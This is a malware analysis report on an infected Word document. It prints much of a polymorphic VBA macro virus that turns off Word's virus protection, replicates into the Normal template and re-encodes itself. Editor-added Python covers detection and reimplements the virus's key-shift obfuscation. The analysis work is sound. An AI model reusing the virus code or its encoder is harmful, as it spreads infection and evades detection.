Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ae11262179a4af9…

MALICIOUS

Office (OLE)

Size: 48.5 KB
Created: 2000-12-30 18:44:00
Authoring application: Microsoft Word 10.0
First seen: 2012-06-14
MD5: 7b5161a633754c272af2e382586131fd
SHA-1: 8268cbbc5933b7485d556b24742cdd0c0d57aaf9
SHA-256: 2ae11262179a4af93dbf9cfc3876c62c9e03ff2d71189fdb95fc8e99ad77e645
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word document whose VBA project carries auto-execution entry points: the heuristics below flag AutoOpen and Document_Open markers, and the recovered module opens with a DOCUMENT_CLOSE handler, so the code runs both when the document is opened and when it is closed. The recovered VBA is a polymorphic macro virus rather than merely obfuscated code. It disables Word's macro virus protection (Options.VirusProtection = False) and the Normal-template save prompt, opens the VBProject code module of both the active document and the Normal template, inspects line 103 of each for the 'MOEBIUS:' label to decide which side is already infected, and then reads the infected side's source and rebuilds it with random identifiers, randomly inserted comment lines and arithmetic expressions that hide constants. It also builds a copy of the source in which every character is shifted by a repeating key, with the key appended after a single quote; on the next run that copy is read back from document variable 1 and the key is recovered by scanning backwards to the quote. The recovered portion contains no download or execution of a second-stage payload; what it shows is self-replication between the document and the Normal template, the classic Word macro-virus pattern. The ClamAV detection Doc.Trojan.Bius-1 is consistent with that.

Heuristics (5)

  • ClamAV: Doc.Trojan.Bius-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bius-1
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    An AutoOpen macro is present; it runs automatically when the document is opened
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open event handler is present; it runs automatically when the document is opened
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution. In this sample it accompanies a fully recovered VBA project (the extracted macros.bas below) whose first procedure is a DOCUMENT_CLOSE handler, so auto-execution is wired to document close as well as open.
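As an added illustration, not part of this report or of the analysis tooling that produced it, the heuristics above can be applied directly to the VBA source that olevba extracts. The scanner below is editor-written Python: it matches auto-execution entry points (legacy WordBasic names and Word document events) and the behaviours visible in this sample's recovered module, over a constructed excerpt modelled on that module. The function names, pattern names and verdict labels are the editor's own, not a real tool's rule set.

```python
import re

# Constructed excerpt in the shape of the VBA recovered from this sample
# (a few lines of the 12 KB module plus an AutoOpen stub to exercise the
# WordBasic-style marker); it is not the full artefact.
SAMPLE_VBA = """Attribute VB_Name = "ThisDocument"
Private Sub DOCUMENT_CLOSE()
On Error Resume Next
MOEBIUS:
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE
Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE
NI = N2.LINES(103, 1)
If Right(NI, 8) = "MOEBIUS:" Then N3 = 1
End Sub
Sub AutoOpen()
End Sub
"""

# Auto-execution entry points: legacy WordBasic names (AutoOpen etc.) and
# Word VBA document events.  VBA identifiers are case-insensitive, so the
# match is too; the canonical spelling is what gets reported.
AUTOEXEC_PROCS = (
    "AutoOpen", "AutoClose", "AutoExec", "AutoExit", "AutoNew",
    "Document_Open", "Document_Close", "Document_New",
)

# Behaviour indicators keyed to what this sample's module shows.  Names
# and patterns are the editor's, not an existing tool's signatures.
BEHAVIOUR_PATTERNS = {
    "disables_macro_virus_protection": r"\bOptions\.VirusProtection\s*=\s*False\b",
    "suppresses_normal_save_prompt":   r"\bOptions\.SaveNormalPrompt\s*=\s*False\b",
    "reads_own_vba_project":           r"\.VBProject\.VBComponents\(",
    "touches_normal_template":         r"\bNormalTemplate\.",
    "suppresses_runtime_errors":       r"^\s*On\s+Error\s+Resume\s+Next\b",
    "moebius_marker":                  r"^\s*MOEBIUS:\s*$",
}

# A procedure definition line: optional scope, Sub/Function, name, "(".
_PROC_DEF = re.compile(
    r"^\s*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?"
    r"(?:Sub|Function)\s+([A-Za-z_]\w*)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)


def find_autoexec(source: str) -> list:
    """Canonical names of auto-exec procedures defined in the source."""
    canon = {name.lower(): name for name in AUTOEXEC_PROCS}
    found = {canon[m.group(1).lower()] for m in _PROC_DEF.finditer(source)
             if m.group(1).lower() in canon}
    return sorted(found)


def find_behaviours(source: str) -> list:
    """Names of the behaviour patterns that occur anywhere in the source."""
    flags = re.IGNORECASE | re.MULTILINE
    return sorted(name for name, pat in BEHAVIOUR_PATTERNS.items()
                  if re.search(pat, source, flags))


def scan_vba(source: str) -> dict:
    """An auto-exec entry point combined with protection tampering or
    self-access to the VBA project is the pairing that separates a macro
    virus from a document that merely contains macros."""
    autoexec = find_autoexec(source)
    behaviours = find_behaviours(source)
    if autoexec and behaviours:
        verdict = "likely-malicious"
    elif autoexec or behaviours:
        verdict = "review"
    else:
        verdict = "no-macro-indicators"
    return {"autoexec": autoexec, "behaviours": behaviours, "verdict": verdict}


if __name__ == "__main__":
    for key, value in scan_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run it against the real macros.bas by reading the file into `scan_vba`; on the excerpt it reports both `AutoOpen` and `Document_Close` as entry points and all six behaviours. Note that this reports only what is literally in the decoded source; a generation that has already been re-encoded into a document variable shows none of these patterns until it is decoded.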

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12194 bytes
SHA-256: a8501347be75a5f48081eca81d3e97cf51e28c385435b8b739d86550e836a4b0

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub DOCUMENT_CLOSE()
On Error Resume Next
MOEBIUS:
Randomize Timer
Options.VirusProtection = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
GI = 8: GJ = 10: GR = 2: NX = 24: GL = 2: LO = 5
X9 = Chr(34): C = Chr(13): CC = Chr(34)
O2 = NORMAL.ThisDocument.Variables(1).Value
O3 = ActiveDocument.Variables(1).Value
'moebius
If Len(O2) > 8000 Or O4 > 18 Then
O5 = 1
Do While Not Mid(O2, Len(O2) - O4, 1) = "'"
O4 = O4 + 1
O7 = Right(O2, O4)
Loop
End If
L = Int(1 * 2)
If Len(O3) > 8000 Or O8 > 18 Then
O6 = 1
Do While Not Mid(O3, Len(O3) - O8, 1) = "'"
O8 = O8 + 1
O9 = Right(O3, O8)
Loop
End If
Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE
Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE
NI = N2.LINES(103, 1)
AI = N1.LINES(103, 1)
If Right(NI, 8) = "MOEBIUS:" Or NI = "Set N6 = N1" Then N3 = 1
If Right(AI, 8) = "MOEBIUS:" Or AI = "Set N6 = N1" Then N4 = 1
If N3 = 0 Then
Set N5 = N2
Set N6 = N1
Else
Set N5 = N1
Set N6 = N2
End If
For W = 1 To 100
N8 = N8 + C
Next W
If O5 = 1 Then V0 = O7: NE = O2: GoTo 9
With N6
For X = 1 To .COUNTOFLINES - 1
N7 = .LINES(X, 1)
If Left(N7, 1) = "'" Then GoTo 0
N8 = N8 & N7 & C
N9 = Int(5 * Rnd + 1)
If N9 = GR And X > 3 Then GoSub NA: U2 = "'" & NB & C: N8 = N8 & U2: U4 = U4 + Len(U2)
0 Next X
N8 = UCase(N8) & "END SUB" & C & "'"
RZ = Len(N8) - U4
End With
GoSub O1: V0 = NB
Do While Not Len(N8) = Len(NE)
Q = Q + 1
H = H + 1
NF = Mid(N8, Q, 1)
H1 = Mid(V0, H, 1)
NG = Chr(Asc(NF) + Asc(H1))
If H = Len(V0) Then H = 0
NE = NE + NG
Loop
NE = NE + "'" + V0
9 LO = 5
GoSub NA: J1 = NB: GoSub NA: J2 = NB: GoSub NA: J3 = NB
GoSub NA: J4 = NB: GoSub NA: J5 = NB: GoSub NA: J6 = NB
GoSub NA: J9 = NB: GoSub NA: JA = NB: GoSub NA: JB = NB
GoSub NA: JC = NB: GoSub NA: JD = NB: GoSub NA: JE = NB
GoSub NA: JF = NB: GoSub NA: JG = NB: GoSub NA: JH = NB
GoSub NA: JI = NB: GoSub NA: JJ = NB: GoSub NA: JK = NB
GoSub NA: JL = NB: GoSub NA: VX = M: GoSub NA: JM = NB
GoSub NA: V1 = NB: GoSub NA: V2 = NB: GoSub NA: V3 = NB
GoSub NA: Q1 = NB: GoSub NA: Q2 = NB: GoSub NA: Q3 = NB
GoSub NA: W1 = NB: GoSub NA: W2 = NB: GoSub NA: W3 = NB
GoSub NA: V4 = NB: GoSub NA: V5 = NB: GoSub NA: V6 = NB
GoSub NA: V7 = NB: GoSub NA: V8 = NB: GoSub NA: V9 = NB
GoSub NA: VA = NB: GoSub NA: VB = NB: GoSub NA: VC = NB
GoSub NA: NK = NB: GoSub NA: JZ = NB: GoSub NA: JV = NB
GoSub NA: TA = NB: GoSub NA: TB = NB: GoSub NA: TC = NB
GoSub NA: TD = NB: GoSub NA: TX = NB: GoSub NA: T4 = NB
GoSub NA: T5 = NB: GoSub NA: T6 = NB: GoSub NA: T7 = NB
GoSub NA: T8 = NB: WL = 10915: GoSub NA: T9 = NB
GoSub NA: JW = NB: NN = NC: GoSub NA: JX = NB: NN = 1
GoSub F1: R0 = F2: GoSub F1: RA = F2: GoSub F1: RB = F2
GoSub F1: RC = F2: GoSub F1: RD = F2: GoSub F1: RE = F2
GoSub F1: RF = F2: GoSub F1: RG = F2: GoSub F1: RH = F2
GoSub F1: RI = F2: NN = 0: GoSub F1: RJ = F2
For M1 = 1 To Len(VX): WW = WW + Asc(Mid(VX, M1, 1)): Next M1
GoTo NW
NA:
NB = Chr(Int(26 * Rnd + 65))
NL = Int((15 - LO) * Rnd + LO)
Do While Not Len(NB) = NL
6 NM = Int((122 - 48 + 1) * Rnd + 48)
If NM > 57 And NM < 65 Then GoTo 6
If NM > 90 And NM < 97 Then GoTo 6
NB = NB + Chr$(NM)
Loop
Return
O1:
NB = Chr(Int(26 * Rnd + 65))
NL = Int((15 - LO) * Rnd + LO)
Do While Not Len(NB) = NL
NM = Int((90 - 65 + 1) * Rnd + 65)
NB = NB + Chr$(NM)
Loop
Return
F1:
NH = Int(1000000 * Rnd + 999)
F3 = Int((2 - 1 + 1) * Rnd + 1)
If F3 = 1 Then NJ = NH + NN: F6 = " - " Else NJ = NN - NH: F6 = " + "
F3 = Int((2 - 1 + 1) * Rnd + 1)
If F3 = 1 Then F4 = "(": F5 = ")" Else: F4 = "": F5 = ""
F3 = Int((3 - 1 + 1) * Rnd + 1)
If F3 = 1 Then F2 = NN Else: F2 = F4 & NJ & F6 & NH & F5
Return
NU:
S = Int(3 * Rnd + 1)
If S = 1 Then NO = "= "
If S = 2 Then NO = "> "
If S = 3 
... (truncated)
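To make concrete what the loop at `Do While Not Len(N8) = Len(NE)` and the backwards quote scan near the top of the handler do, here is an editor-written Python reimplementation, added here and not code from the report or from the sample. It reproduces the sample's key generator (the O1 subroutine), the per-character shift with a repeating key followed by the key after a single quote, and the split that recovers the key (the O4/O7 loop). The decode is assumed to be the plain inverse subtraction: the preview is truncated before the sample's own decode path, so that part is the editor's reconstruction. The sample text is constructed.

```python
import random

QUOTE = "'"


def make_key(rng: random.Random, lo: int = 5) -> str:
    """Key generator as in the O1 subroutine: one uppercase letter, then
    uppercase letters until the length reaches Int((15 - LO) * Rnd + LO),
    i.e. 5 to 14 characters for LO = 5."""
    length = int((15 - lo) * rng.random() + lo)
    key = chr(int(26 * rng.random() + 65))
    while len(key) != length:
        key += chr(int(26 * rng.random() + 65))
    return key


def encode(plain: str, key: str) -> str:
    """The shift loop: NG = Chr(Asc(NF) + Asc(H1)) with H cycling through
    the key, then NE = NE + "'" + V0.  Key characters are letters (65..90),
    so every ciphertext code point is >= 65 and a quote (39) cannot occur in
    the body; the trailing quote is therefore an unambiguous separator."""
    if not key or not (key.isascii() and key.isalpha() and key.isupper()):
        raise ValueError("key must be non-empty ASCII uppercase letters")
    out = []
    h = 0
    for ch in plain:
        out.append(chr(ord(ch) + ord(key[h])))
        h = (h + 1) % len(key)          # If H = Len(V0) Then H = 0
    return "".join(out) + QUOTE + key


def split_blob(blob: str) -> tuple:
    """The backwards scan at the top of the handler: step O4 from the end
    until Mid(O2, Len(O2) - O4, 1) is a quote; O7 = Right(O2, O4) is the key
    and everything before the quote is the shifted body."""
    if not blob:
        raise ValueError("empty blob")
    n = 0
    while blob[len(blob) - 1 - n] != QUOTE:
        n += 1
        if n >= len(blob):
            raise ValueError("no key separator found")
    return blob[:len(blob) - 1 - n], blob[len(blob) - n:]


def decode(blob: str) -> str:
    """Editor's assumed inverse of encode: subtract the repeating key
    character by character.  A negative result means the wrong key."""
    body, key = split_blob(blob)
    if not key:
        raise ValueError("empty key")
    out = []
    for i, ch in enumerate(body):
        v = ord(ch) - ord(key[i % len(key)])
        if v < 0:
            raise ValueError("ciphertext/key mismatch at offset %d" % i)
        out.append(chr(v))
    return "".join(out)


if __name__ == "__main__":
    rng = random.Random(2012)
    key = make_key(rng)
    # Constructed plaintext in the shape the sample produces: upper-cased
    # source ending in END SUB, a CR and a quote (UCase(N8) & "END SUB" & C & "'").
    src = "OPTIONS.VIRUSPROTECTION = FALSE\rMOEBIUS:\rEND SUB\r'"
    blob = encode(src, key)
    print("key:", key)
    print("round trip ok:", decode(blob) == src)
```

This is why the encoded generation is invisible to string-based signatures: the body is a per-character shift, not a substitution with a fixed table, and the key changes on every infection. It is also why recovering it is trivial once the storage format is known: the key sits in clear text after the last quote, and a single subtraction pass restores the source that the scanner above can then inspect.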